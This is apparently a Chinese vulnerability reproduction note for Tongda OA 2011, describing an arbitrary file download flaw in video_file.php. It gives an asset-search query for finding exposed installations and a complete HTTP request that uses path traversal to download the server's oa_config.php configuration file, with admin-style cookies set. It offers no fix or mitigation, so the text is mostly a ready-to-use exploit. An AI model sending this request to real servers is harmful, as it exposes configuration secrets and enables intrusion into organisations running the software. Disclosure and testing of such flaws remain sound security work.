一、漏洞简介
通达OA video_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件。
二、影响版本
● 通达OA2011
三、资产测绘
● hunterapp.name="通达 OA"
● 特征
四、漏洞复现
GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=6ad99af9; PHPSESSID=1; KEY_RANDOMDATA=13202
Upgrade-Insecure-Requests: 1